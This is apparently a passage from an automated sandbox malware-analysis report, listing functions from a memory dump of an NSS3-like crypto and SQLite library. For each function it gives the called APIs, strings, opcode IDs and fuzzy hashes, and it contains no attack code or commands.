temporary table name must be unqualified, xrefs: 6C6DF734
table, xrefs: 6C6DF05C, 6C6DFABC, 6C6DFAC7

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$/G6/$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-2727598485
Opcode ID: c36ced7a4dec10fb4d434aff69e10620aea0efeb3bc5639045cea0a32a662ac5
Instruction ID: 16d2907ef502ca485c1a656d5aaaba7280ba6738607cd12ef6319fba5fc808bb
Opcode Fuzzy Hash: c36ced7a4dec10fb4d434aff69e10620aea0efeb3bc5639045cea0a32a662ac5
Instruction Fuzzy Hash: B772C170E042058FDB14CF68C484BAABBF2FF49308F1681ADD8159BB52D775E846CB96

Function 6C858D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8A14E4,6C80CC70), ref: 6C858D47
PR_GetCurrentThread.NSS3 ref: 6C858D98

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C858E7B
htons.WSOCK32(?), ref: 6C858EDB
PR_GetCurrentThread.NSS3 ref: 6C858F99
PR_GetCurrentThread.NSS3 ref: 6C85910A

Strings

%u.%u.%u.%u, xrefs: 6C858E74

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 8ace9785f20781cb49fd06cbeacc52d603eb9e0abf339493c29d9a4c42049483
Instruction ID: c2f47822a2a7e2ed6e54c0bdcd0b281aceb5a44d9014100f45b9743acb522ea3
Opcode Fuzzy Hash: 8ace9785f20781cb49fd06cbeacc52d603eb9e0abf339493c29d9a4c42049483
Instruction Fuzzy Hash: AB02FF31A461618FDB34CF19C56836ABBB3EF42304F998A9EC8914FB91C3B5D916C790

Function 6C7D68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C7D68FC
PR_EnterMonitor.NSS3 ref: 6C7D6924

Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090AB
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090C9
Part of subcall function 6C809090: EnterCriticalSection.KERNEL32 ref: 6C8090E5
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C809116
Part of subcall function 6C809090: LeaveCriticalSection.KERNEL32 ref: 6C80913F

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

PR_EnterMonitor.NSS3 ref: 6C7D693E
TlsGetValue.KERNEL32 ref: 6C7D6977
TlsGetValue.KERNEL32 ref: 6C7D69B8
PR_ExitMonitor.NSS3 ref: 6C7D6B1E
PR_ExitMonitor.NSS3 ref: 6C7D6B39
TlsGetValue.KERNEL32 ref: 6C7D6B62

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 68ba7b67eecec50adf534c7be52488298da7fe4e0eee2073875d3f9f0c5773ce
Instruction ID: 47e1149f225e4b22c1032d3a259069239dc8054917d4830f6a66d16ce3a6047a
Opcode Fuzzy Hash: 68ba7b67eecec50adf534c7be52488298da7fe4e0eee2073875d3f9f0c5773ce
Instruction Fuzzy Hash: F6917074658600CBDB50EF2DC68495E7BA2FB87308F728A69C844DFA19C775FA41CB81

Function 6C7609A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7606A0: TlsGetValue.KERNEL32 ref: 6C7606C2
Part of subcall function 6C7606A0: EnterCriticalSection.KERNEL32(?), ref: 6C7606D6
Part of subcall function 6C7606A0: PR_Unlock.NSS3 ref: 6C7606EB

memcmp.VCRUNTIME140(00000000,6C749B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C749B8A,00000000,k-tl), ref: 6C7609D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C749B8A,00000000,k-tl), ref: 6C7609F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C749B8A,00000000,k-tl), ref: 6C760A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C749B8A,00000000,k-tl), ref: 6C760A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C749B8A,00000000,k-tl), ref: 6C760A48

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 450449f6b5ef3889e89d468f12fe082d19feeba9f3252481a4769c77a2e1e703
Instruction ID: d966dc9cf5ceeb0c601d8b56775c9f7f550d7f0bcda5c4d62f971a74ec98c519
Opcode Fuzzy Hash: 450449f6b5ef3889e89d468f12fe082d19feeba9f3252481a4769c77a2e1e703
Instruction Fuzzy Hash: 8102E1B1E002049FEB008F66DE49BAB77B9FF48358F044129ED05A7B52EB31E955CB91

Function 6C7D6BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7D6C2C

Part of subcall function 6C7D6E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C7D6BF7), ref: 6C7D6EB6
Part of subcall function 6C7D6E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C87FC0A,6C7D6BF7), ref: 6C7D6ECD
Part of subcall function 6C7D6E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7D6EE0
Part of subcall function 6C7D6E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C7D6EFC
Part of subcall function 6C7D6E90: PR_NewLock.NSS3 ref: 6C7D6F04
Part of subcall function 6C7D6E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7D6F18
Part of subcall function 6C7D6E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C7D6BF7), ref: 6C7D6F30
Part of subcall function 6C7D6E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C7D6BF7), ref: 6C7D6F54

TlsGetValue.KERNEL32 ref: 6C7D6D93
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C7D6BF7), ref: 6C7D6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C7D6BF7), ref: 6C7D6FFD

Strings

NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C7D6FDB
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C7D6FF8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Secure$Value$Lockfclosefopenftellfwrite
String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
API String ID: 3032383292-3007362596
Opcode ID: 9add09127e59e914b28ef9ef9fd9cf168117032fc08515b068ce4ea997d2cae9
Instruction ID: 8b63522592b2eec1188745695223b056575a25108fe7c8328fa4924d7ee85ee4
Opcode Fuzzy Hash: 9add09127e59e914b28ef9ef9fd9cf168117032fc08515b068ce4ea997d2cae9
Instruction Fuzzy Hash: 50715172348545CBDB388A6CE7A55283BB5B75B70EF420A39C8078BB81D7387642C792

Function 6C7EC9E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187timeCOMMON

Download Yara Rule

APIs

PR_NormalizeTime.NSS3(00000000,?), ref: 6C7ECEA5

Strings

/G6/, xrefs: 6C7EC9EF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: NormalizeTime
String ID: /G6/
API String ID: 1467309002-570549270
Opcode ID: 0b7887da89d3c65cab25a3f333281bbb448da109912b94eb1559db2d67d389f1
Instruction ID: fa802b0ea3183b81f78d1ec307f31b2cdabc328265b38817963e010ff5d68de7
Opcode Fuzzy Hash: 0b7887da89d3c65cab25a3f333281bbb448da109912b94eb1559db2d67d389f1
Instruction Fuzzy Hash: 34719371A057018FC304CF39C98462ABBE5FF89318F258A2DE4A9CB7A1E730D955CB95

Function 6C720820 Relevance: 10.4, APIs: 1, Strings: 5, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C7211D2

Strings

@, xrefs: 6C720B17
authorizer malfunction, xrefs: 6C721BD2
/G6/, xrefs: 6C72082F
not authorized, xrefs: 6C72175E, 6C721763
rows deleted, xrefs: 6C7217D2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memset
String ID: /G6/$@$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-3489660820
Opcode ID: 6f187bfa0b20a45e2b6b177de2c42f30eb21bd3654797cf2e64f45454d59fc7d
Instruction ID: 87f018c12bbc4615c80c35855062d49292ea67b03b3cc89216a04bafdedf3999
Opcode Fuzzy Hash: 6f187bfa0b20a45e2b6b177de2c42f30eb21bd3654797cf2e64f45454d59fc7d
Instruction Fuzzy Hash: F0D2AA70E04249CFDB14CFA9C594B9DBBF2BF49308F288169D415ABB51D77AE846CB80

Function 6C7B0E20 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C7B1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C7B1086

Strings

h({l, xrefs: 6C7B0E55, 6C7B0EC4, 6C7B0F3A, 6C7B0FA7
/G6/, xrefs: 6C7B0E35
h({l, xrefs: 6C7B1062, 6C7B105D, 6C7B0F37, 6C7B1081, 6C7B1082

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpymemset
String ID: /G6/$h({l$h({l
API String ID: 1297977491-1424826158
Opcode ID: 6a5558ca504f732bf7c0ba3273b624bf750c073e1725540d30f59acb17b01c16
Instruction ID: 62db4c160c056baf20e487bf3d66ddcce5716face4460c60b9be3aca69a8e604
Opcode Fuzzy Hash: 6a5558ca504f732bf7c0ba3273b624bf750c073e1725540d30f59acb17b01c16
Instruction Fuzzy Hash: 6CA12B71B0124A9FDF08CF99DA94AEEBBB6BF88314B148129E915B7700D735EC11CB90

Function 6C85CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C85D086
PR_Malloc.NSS3(00000001), ref: 6C85D0B9
PR_Free.NSS3(?), ref: 6C85D138

Strings

>, xrefs: 6C85CF5B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: a57993a5a8e96592774f473e0571eda3d589d566bd0959ac2be528071605e5db
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 93D18122B8154A4BFBB4487D8FA03D9B7938746374FD80B2AD9218BBD6E5D98853C301

Function 6C6D6F10 Relevance: 6.5, Strings: 5, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C6D702B
/G6/, xrefs: 6C6D6F1C
noskipscan*, xrefs: 6C6D7067
*?[, xrefs: 6C6D7034, 6C6D7052, 6C6D7070
sz=[0-9]*, xrefs: 6C6D7049

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: *?[$/G6/$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-293109812
Opcode ID: b2460334c4d67254c4d06f5195cb4bc8832c1971401a6fbf74a400e9c158607e
Instruction ID: ad2f627af17dfd2145082e6318b140e1805277a0293cf32f2476653052116639
Opcode Fuzzy Hash: b2460334c4d67254c4d06f5195cb4bc8832c1971401a6fbf74a400e9c158607e
Instruction Fuzzy Hash: DD716C72F002114BDB208E6DCC803DA73A39B85318F2A0639CD55ABBD5D671AC4687DB

Function 6C7FAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67e91d85ee41fa898147c0ae5d17695140111910a5072eff1a5f01f984d41175
Instruction ID: 9b31d6791b0b648768584f88ab0f179099ba200e17b41f970b2a46f0ac8514e9
Opcode Fuzzy Hash: 67e91d85ee41fa898147c0ae5d17695140111910a5072eff1a5f01f984d41175
Instruction Fuzzy Hash: AFF1AD71E012168BEB24CF6CDA803AD7BB1BB8A308F15423DD915D7B54EB74A956CBC0

Function 6C726900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

BBB, xrefs: 6C727207, 6C72780B
authorizer malfunction, xrefs: 6C727910
not authorized, xrefs: 6C7278EC, 6C7278F1
sqlite\_%, xrefs: 6C726953

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: fe85dff753b8ae90503a34f36cfa4000f3b9d1bede188405adaaac633ee33694
Instruction ID: 23187641025c290eb10b05d674b8cc3c689d122cb429b34fed0367e003cdb525
Opcode Fuzzy Hash: fe85dff753b8ae90503a34f36cfa4000f3b9d1bede188405adaaac633ee33694
Instruction Fuzzy Hash: 70C28F74E00205DFCB14CF59C580AA9BBF2FF89308F2481ADD915AB756D73AA956CF80

Function 6C6DAC60 Relevance: 3.9, Strings: 3, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6C6DAE18
winUnlockReadLock, xrefs: 6C6DAE9F
/G6/, xrefs: 6C6DAC72

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: /G6/$winUnlock$winUnlockReadLock
API String ID: 0-1585411584
Opcode ID: 42e7a02d69d56175f202823a9e3276ff365993561b0a65ed5804e01c18b129fd
Instruction ID: 043723dffcb79b23671ebc144dd3a5ce61872ed926771bb1004ef03847983fef
Opcode Fuzzy Hash: 42e7a02d69d56175f202823a9e3276ff365993561b0a65ed5804e01c18b129fd
Instruction Fuzzy Hash: 117182716082419FDB24CF29D880AABBBF5FF89318F15CA28F94997241D730A985CBD5

Function 6C7049F0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 673COMMON

Download Yara Rule

Strings

/G6/, xrefs: 6C704A01

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: /G6/
API String ID: 0-570549270
Opcode ID: f84e1f27d38ba010bb546d99707686ea7ea734ede888cd43fac861a487801914
Instruction ID: ea108850ad156381ea00a67249efca921a7e352e9a6e860c86cf64449354a1e4
Opcode Fuzzy Hash: f84e1f27d38ba010bb546d99707686ea7ea734ede888cd43fac861a487801914
Instruction Fuzzy Hash: 9C527AB4E002098FDB04CF59D580BAEBBF2FF99318F248269D914AB751D735E842CB94

Function 6C76EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C76F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C76F0F9

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 6f8e92281938b235f6efbc96fb90b8bd1088bd136a7fb44bbf7f22f9ff85f16f
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: E291BF75E0061A8BCB14CF69C9906AEB7F1FF85324F24472DD962A7BC1D730A905CBA0

Function 6C792F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

